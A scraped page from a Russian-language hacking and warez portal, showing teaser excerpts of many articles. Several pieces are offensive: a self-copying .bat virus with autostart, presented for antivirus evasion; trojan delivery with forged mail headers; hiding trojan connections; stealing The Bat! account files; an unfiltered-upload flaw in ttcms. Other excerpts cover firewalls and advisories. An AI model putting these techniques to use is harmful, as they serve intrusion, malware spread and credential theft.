|
| Скачать фильмы за 20 мин.
| |
Начни день с нами занеси наш сайт в закладки -)
|
|
|
|
 Найденный баг
В этой статье мы хотим рассказать о
несостоятельности всяческих систем
администрирования, которые начали
заполнять просторы интернета. Все сайты на
одно лицо, у всех одни и те же уязвимости (Баг-Траки
просто увязли в уязвимостях PHP-Nuk'а).
Все началось с того, что мы обнаружили
уязвимость в ttcms (http://ttcms.com).
Мы не стали разбираться в каких версиях
этот баг пофиксили, но 2.х версии
практически все уязвимы. Каждый
пользователь может по умолчанию загружать
файлы на сервер через модуль upload. При этом в
ttcms не фильтруются загружаемые файлы по
расширению. То есть любой файл, загруженный
нами, может быть доступен по адресу:
http://жертва/ttcms_directory/files/file.php
| |
|
|
 Сервис это программа написанная особым образом, чаще всего имеющая привилегии local SYSTEM. Сервисы используются как системные службы, например для ведения логов, работы web-сервера и т.д. Как же система различает сервис это или обычная программа? Система просматривает реестр, где зарегистрированы все сервисы. Данная база доступна для просмотра в Microsoft Management Console (mmc.exe), но только для пользователей с правами администратора. Так же этот список всех сервисов можно просмотреть в реестре по ключу:
HKEY_LOCAL_MACHINESYSTEM CurrentControlSetServices
Атака подменой сервиса
Основной смысл атаки на сервисы заключается в их подмене. К примеру: есть
сервис logon.scr, который представляет собой "Logon Screen Saver" - системный
хранитель экрана.
| |
|
|
Как уже сообщала "Компьюлента", 15 октября корпорация Microsoft выпустила пять новых бюллетеней безопасности с описанием новых дыр в операционных системах семейства Windows. В первых двух из них обсуждались проблемы, связанные с технологией ActiveX, остальные же бюллетени посвящены ошибкам переполнения буфера в других модулях популярных операционных систем Microsoft.
Бюллетень MS03-043 описывает ошибку переполнения буфера в системной службе Messenger. Эта служба не имеет ничего общего с популярными интернет-пейджерами MSN Messenger и Windows Messenger и служит для передачи по сети сообщений от одного пользователя к другому, а также для различных оповещений, например, о завершении печати документа на сетевом принтере.
| |
|
|
 Внимание: ваш антивирус может закричать, запищать и т.д.
что в этой статье есть вирус но убеждаю вас что ничего вредоносного в ней нет.
Я хочу показать вам хороший способ шифрования bat вирусов. Возьмем для примера вот этот безобидный код:
cls
@echo off
copy %0 %windir%desktop*.bat
copy %0 %windir%startm~1progra~1auotst~1WSt.bat
for %%v in (*.bat) do copy %0 %%v
copy %0 c:
cls
Он делает следующее: копирует свои копии на рабочий стол, добавляет себя в автозапуск. Такой bat файл видит почти любой антивирус. Но нам-то нужно, что бы он не видел
:).
| |
|
|
Недостаток обнаружен в Microsoft Windows Server 2003. Удаленный пользователь может сослаться на различные файлы относительно "Shell Folders" на целевой системе. Эта проблема может облегчить эксплуатацию других уязвимостей.
Удаленный пользователь может сконструировать HTML, который может сослаться на различные "shell folders" на системе используя '..' символы обхода каталога в комбинации с 'shell:' URL. Удаленный пользователь не должен знать или предполагать имя учетной записи целевого пользователя, чтобы получить доступ к этим директориям.
| |
|
|
 В последнее время компьютерный мир захлестнула волна макро вирусов. Почему же данные вирусы получили такое распространение? Всё довольно просто - для создания макро вируса не нужно каких либо глубоких познаний в программировании, так же не нужно знания ассемблера. Что позволило множеству неопытных программистов попробовать свои силы в разработке вирусов. Что же необходимо для разработки макро вируса? Во первых это минимальное знание языка VB и желательно VBA, для разработки полностью готового к распространению макро вируса вам понадобится Microsoft Word 97/2000 и желательно какой-нибудь антивирус с обновлёнными базами.
| |
|
|
 Найден новый метод обхода SurfControl для MS Proxy. Итак, как же обойти этот дурацкий механизм фильтрации урлов...
Системы уязвимы:
SurfControl для MS Proxy version 3.0.2.
Тестовые условия:
Мы установили "правила" так, чтобы запретить доступ к сайтам, классифицированным, как Adult/Sexually Explicit, Hacking, etc. (как всегда, все самое интересное :) А это означает, что любой, кто попытается зайти на www."заблокированный сайт".com получит вместо инфы большой и жирный кукиш от вредной проги - SurfControl.
| |
|
|
 Зачем это нужно? Как известно, компьютеры взламывают через ошибки в программах или их настройках. Очевидно, что если доступных из сети программ (сервисов) нет, то взломать такой компьютер невозможно (это то же самое, что пытаться взломать компьютер, не включенный в сеть вообще).
Как защититься? Сервисы нужны. Иначе бы их не было :) Хотелось бы, чтобы они были доступны только с некоторых машин, например, из локальной сети. Стандартное решение - использование брандмауэра - программы или железяки, избирательно пропускающей информацию по сети.
| |
|
|
 Наверное, ты крутой, просто очень крутой WEB дизайнер. Так вот, сделал ты однажды сервер (купил... за чужую креду, наверное) или просто WEB страничку. Проходит день, другой, третий (месяц уже прошел... к тебе уже приехали из отдела по борьбе с экономическими преступлениями за использование той креды, про которую я говорил :)), а к тебе на сайт так никто кроме тебя и твоих друзей не зашел (вот облом...). "Что ж делать?!" - спросишь ты, а я отвечу: "А ничего не делать, копить кучу гринов и платить какой-нить фирме, чтоб она твои баннеры показывала...:(" Такой вариант, я понял, тебя не устраивает. Тогда читай эту статью до конца и делай, как будет написано! (а деньги, если хочешь, можешь мне прислать:))
Хочу заранее оговориться, что некоторые методы не очень-то и легальны, поэтому ты будешь юзать их на свой страх и риск...
| |
|
|
 Что главное для троянов и прочих программ "удаленного управления" компом? Конечно незаметность! И даже если получиться сокрыть саму программу, в частности дав ей "невидимость" в диспетчере задач, то это целиком не решит всей проблемы. Остается еще один способ обнаружения таких программ - через их функции работы с сетью. Иногда сканер выдает: "открыто: 12345 порт - удаленное администрирование или trojan". Вот так и ловятся трояны :)
Поэтому я тебе поведаю о способах сокрытия сетевых соединений, в чисто ознакомительных целях, конечно :) Для начала рассмотрим, как можно обнаружить присутствие твоей проги на чужом компе.
Как ты знаешь, трояны состоят из серверной и клиентской частей, причем серверная находиться на чужом компе. Отсюда и открытый порт трояна, который и обнаруживается сканером портов.
| |
|
|
 Инструменты: W32Dasm v 8.93, SoftIce v 4.x (или) Spy++.
Всем нравится трепаться по Асе и другим IM-системам, и никто не хочет за это удовольствие деньги авторам того же клиента отстегивать. Чтобы спасти свой бюджет производители вставляют в софт баннеры, которые приносят деньги первым и раздражают своим миганием пользователей. Однако, если клиент вдруг захочет избавиться от баннера, сможет ли он это сделать?
Коль скоро, защиту ICQ исследуют все кому только не лень, посмотрим как организована реклама в IM-клиенте Odigo. Скачиваем русскую версию, инсталим ее, регимся (сомневаюсь, что у кого-то уже есть аккаунт в Odigo) и вот он внизу окошка противный такой желтый - баннер.
| |
|
|
 Сегодня мы поговорим об установке hook'ов (ловушек) в Windows.
Hook - это механизм перехвата сообщений, путем установки специальной функции на верх стека hook-функций системы. Без установки таких ловушек практически невозможно обойтись при написании различных средств удаленного администрирования, шпионов и других программ в той или иной степени осуществляющих контроль за пользователем, использующем ОС Windows. Hook'и бывают глобальные (на всю систему) и локальные (на какой-либо поток).
Установить в систему hook можно при помощи функции SetWindowsHookEx(), со следующим заголовком:
HHOOK SetWindowsHookEx(int idHook, HOOKPROC lpfn, HINSTANCE hMod, DWORD dwThreadId);
| |
|
|
 Привет, перец! Угадай, о чем у нас пойдет речь? Нет, не о том, какое пиво лучше и даже не о том, как проагрейдить твой комп за 200 вечнозеленых. А поговорим мы о службах рассылок. Для начала лично разберемся с самыми известными серверами, а потом попробуем использовать их в наших грязных, спамерских целях :). Да, это гнусно и жестоко, но такова жизнь. Итак, начнем.
Subscribe (http://www.subscribe.ru)
Предлагаю начать с самой популярной в рунете службы рассылок. У Сабскрайба самое большое количество подписчиков! Кстати, недавно видел по телику рекламу? "Стань миллионным подписчиком Subsribe.ru и получи приз!". Нехило, да?
Теперь давай немного "попинаем" дисигн сайта ;). Тут все по-деловому и довольно скучно (правой в челюсть). При среднем качестве соединения грузится довольно долго (левой в живот).
| |
|
|
Когда аккаунт в Бэте находится под паролем, его владелец думает, что
это уже safety. Дадим же ему разочароваться в этом!
Обычно все аккаунты хранятся в директории [bat_dir]mail, но товарищи
поумнее заменяют default folder на что-нибудь более скрытое... Обычно
дело на этом заканчивается. Поэтому ищи файл ACCOUNT.CFG.
...сейчас ты должен искать...
...сейчас ты должен искать...
...сейчас ты должен найти...или ты тормоз...
Открывай account.cfg. Пока - чем угодно.
| |
|
|
Уязвимость обнаружена в mIRC клиенте. Удаленный атакующий может выполнить произвольный код на уязвимой системе. Переполнение буфера обнаружено в параметре host. Удаленный атакующий может представить значение параметра host длиннее 110 байт, чтобы переполнить буфер и выполнить произвольный код на уязвимой системе.
| |
|
|
 Предисловие:
Тебе приходилось когда-нибудь отсылать трояны "от другого лица" на ящики пользователей? Тогда ты знаешь, что успех зависит от нескольких факторов: во-первых от того, кому попало письмо (ламер, юзер, хакер и т.д.), во-вторых от умения использовать социальную инженерию и в-третьих от умения фальсификации заголовков.
Инструментарий:
| |
|
|
 Очень часто у простых юзверей IRC возникают вопросы, кто такие иркопы, как размножаются :) и как вообще все устроено. Источников на русском языке по этому поводу я пока так и не встречал. А вот всяких небылиц и баек полно. В конце концов юзер думает, что иркоп это высшая форма живой материи, не поддающаяся стандартным законам :). Прочитав эту статью, вопросов по этому поводу у тебя больше не возникнет.
-= Кто они? =-
Держись за табуретку, сейчас узнаешь правду :). Иркопы такие же обычные люди, как и ты :).
| |
|
|
 В этой статье я расскажу вам самые основы о фаерволлах(брандмауэрах). Файрволлы/брандмауэры-это устройства(программные или аппаратные), которые блокируют доступ к вашей сети извне. Это можно считать одной из первых линий обороны в любой системе. Для них устанавливаются определенные правила, например блокировка подключений с определенного IP, для блокирования определенного протокола (например ICMP - ping) и т.д. Многие брандмауэры используют шифрование(например DES,IPSEC,IDEA) для тотального обламывания снифферов и спуферов:). Существует несколько видов Фаерволлов/Брандмауэров:
ШЛЮЗЫ
Точнее шлюзы
приложений. Играют роль прокси. Плюсы его в
том, что он производит более детальный
контроль над службой, чем фильтры.
| |
|
|
 Сейчас, в эпоху повального распространения Интернета, вряд ли можно встретить какой-нибудь офис без оного. Любая секретутка, мелкий менеджер, оператор конвейерного цеха, дворник, стоп, кажется уже перегнул, короче – Интернет есть у всех. Ясное дело, что сидя на работе не очень-то хочется делать именно работу, ведь есть куча чатов, порносайтов – да мало ли чего! Но часто на этих самых работах сидят вредные админы, которые либо ставят ограничения на подключение к определённым видам сайтов, либо еженедельно тащут отчёт начальству по этому поводу. И то, и другое как-то неприятно. Конечно, если ты – прилежный трудоголик и на работе даже представить себе ничего не можешь кроме этой самой работы – эта статья не для тебя. Спасибо за клик по баннерам, ну, в общем, до свиданья… Если же мы понимаем друг друга – то вот тебе, дорогой друг, краткий и поучительный эпос с конкретным руководством к действию по обходу такого незаконного надзора (я уже чувствую себя борцом за защиту прав человека).
| |
|
|
1. Теория
Достоверно идентифицировать пользователя в сети - очень важная задача. Если пользователь неверно идентифицирован, он может получить слишком высокие права доступа либо воспользоваться платными ресурсами за чужой счет. Система должна быть защищена не только от сбоя, но и от намеренной попытки пользователя обмануть ее.
Все достаточно просто, если протокол, используемой системой, специально разработан
для поддержки авторизации пользователя. В этом случае забота о безопасности лежит
на создателе протокола, и рядовому администратору сети не обязательно вникать в
детали его реализации.
| |
Варез портал существует с 2003 - 2008 / Хостинг предоставили MacHoster.Ru
|
|
 |
|
|
